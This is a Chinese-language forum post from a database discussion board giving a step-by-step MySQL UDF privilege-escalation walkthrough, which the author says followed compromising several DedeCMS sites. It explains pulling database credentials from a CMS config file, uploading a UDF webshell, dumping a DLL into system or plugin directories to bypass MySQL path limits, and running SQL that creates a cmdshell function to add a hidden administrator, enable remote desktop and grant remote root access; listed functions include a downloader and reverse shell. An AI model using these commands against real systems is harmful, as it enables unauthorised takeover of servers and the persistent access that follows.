mysql root UDF.PHP 提权_MySQL, Oracle及数据库讨论区_Weblogic技术|Tuxedo技术|中间件技术|Oracle论坛|JAVA论坛|Linux/Unix技术|hadoop论坛_联动北方技术论坛  
网站首页 | 关于我们 | 服务中心 | 经验交流 | 公司荣誉 | 成功案例 | 合作伙伴 | 联系我们 |
联动北方-国内领先的云技术服务提供商
»  游客             当前位置:  论坛首页 »  自由讨论区 »  MySQL, Oracle及数据库讨论区 »
总帖数
1
每页帖数
101/1页1
返回列表
0
发起投票  发起投票 发新帖子
查看: 2990 | 回复: 0   主题: mysql root UDF.PHP 提权        下一篇 
fozhyn
注册用户
等级:上士
经验:317
发帖:101
精华:0
注册:2011-10-18
状态:离线
发送短消息息给fozhyn 加好友    发送短消息息给fozhyn 发消息
发表于: IP:您无权察看 2014-12-31 17:28:35 | [全部帖] [楼主帖] 楼主

今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。

测试经典的UDF.dll提权一次性成功。

dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。

首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。

作者:

二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。

三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。

第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到”No paths allowed for shared library”错误。

第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname ‘导出的DLL路径’;对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到”Can’t open shared library”错误,这时你必须将DLL重新导出到系统目录。

如果执行: create function cmdshell returns string soname ‘udf.dll’ 出现: 数据库查讯出错,请检查SQL语句create function cmdshell returns string soname ‘udf.dll’的语法是否正确。Function ‘cmdshell’ already exists

解释:

在有些版本的MYSQL上确实会发生这事.这是一个MYSQL的BUG,官方描述如下:

http://bugs.mysql.com/bug.php?id=15439
Description: Under some circumstances, case handling of UDF names leads to strange behaviour. This can result in a situation where the function can be successfully dropped without actually removing the corresponding entry from the mysql.func table.


………… ——————————– 解决这个问题你可以输入手工输入 delete from mysql.func where name=’cmdshell’

第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名(‘参数列表’); 每个函数有不同的参数,你可以使用select 创建的函数名(‘help’);来获得指定函数的参数列表信息。

四、功能函数说明: cmdshell 执行cmd; downloader 下载者,到网上下载指定文件并保存到指定目录; open3389 通用开3389终端服务,可指定端口(不改端口无需重启); backshell 反弹Shell; ProcessView 枚举系统进程; KillProcess 终止指定进程; regread 读注册表; regwrite 写注册表; shut 关机,注销,重启; about 说明与帮助函数;

也可一次执行一下语句: create function cmdshell returns string soname ‘udf.dll’  select cmdshell(‘net user iis_user 123!@#abcABC /add’);  select cmdshell(‘net localgroup administrators iis_user /add’);  select cmdshell(‘regedit /s d:web3389.reg’);  drop function cmdshell;  select cmdshell(‘netstat -an’);

最后用 iis_user 123!@#abcABC登录就行了。

mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能。
但是对于UDF的具体限制,MYSQL的各个版本各有不同。 下面详细说明一下:
MYSQL 4.1以前的版本中,可以将所有的DLL文件里面的任何函数都注册到MYSQL里面以供MYSQL调用。
无论这个DLL在什么位置,函数的声明是什么样的。
MYSQL 4.1及以后的版本中,对UDF函数进行了限制,只有实现了一个特定接口的函数才可以被成功注册到MYSQL中。

而后续版本又逐步加强了控制,以往的操作会遇到 以下错误:

1124 - No paths allowed for shared library


因为在mysql5之后不能用绝对路径
5.0及以后的版本,要上传到系统目录或PATH这个环境变量所表示的任何一个目录
5.1及以后的版本,要上传到mysql安装目录下的lib/plugin目录

MYSQL5以后,对注册的DLL的位置有了限制,创建函数的时候,所对应的DLL不能包含/或者\,简单的理解就是不能是绝对路径。所以我们将DLL释放到system32目录,来跳过这个限制。。或者放到盘符的根目录下通过c:udf.dll这种形式的写法来跳过限制。
只要把dll放到PATH这个环境变量所表示的任何一个目录下面,效果跟放到system32目录下面一样。

1126 - Can't open shared library 'udf.dll'


这是因为MYSQL 5.1及以后的版本中,又多了一个限制。
创建函数时所用的DLL只能放在mysql的plugin目录里面
而且这个plugin目录默认是不存在的
那么自己在mysql安装目录下建lib/plugin 文件夹,把udf.dll导到这里就行
这里又有个技巧,显示mysql的安装路径 SHOW VARIABLES LIKE '%plugin%';

PS :


UDF使用(建表,这个表有个装二进制内容的字段,把udf.dll的内容二进制写到表中,导出DLL,建立方法,调用方法)
有的人问怎么在没shell的情况下提权,如果你知道上面这些,也就是UDF流程,那么我想你应该懂了。

以下是引用片段:

CREATE TABLE stream_udf (shellcode BLOB);
INSERT into stream_udf values (CONVERT(传说中的shellcode,因为太长,要的去赣友网下,CHAR));
SELECT shellcode FROM stream_udf INTO DUMPFILE 'C:/windows/streamudf.dll';
Create Function state returns string soname 'streamudf.dll';
select state('net user');
DROP TABLE stream_udf;


加用户的语句

以下是引用片段:

GRANT ALL PRIVILEGES ON *.* TO'stream'@'%'IDENTIFIED BY '123456' WITH GRANT OPTION;


工具:udf.rar

--转自 北京联动北方科技有限公司




赞(0)    操作        顶端 
总帖数
1
每页帖数
101/1页1
返回列表
发新帖子
请输入验证码: 点击刷新验证码
您需要登录后才可以回帖 登录 | 注册
技术讨论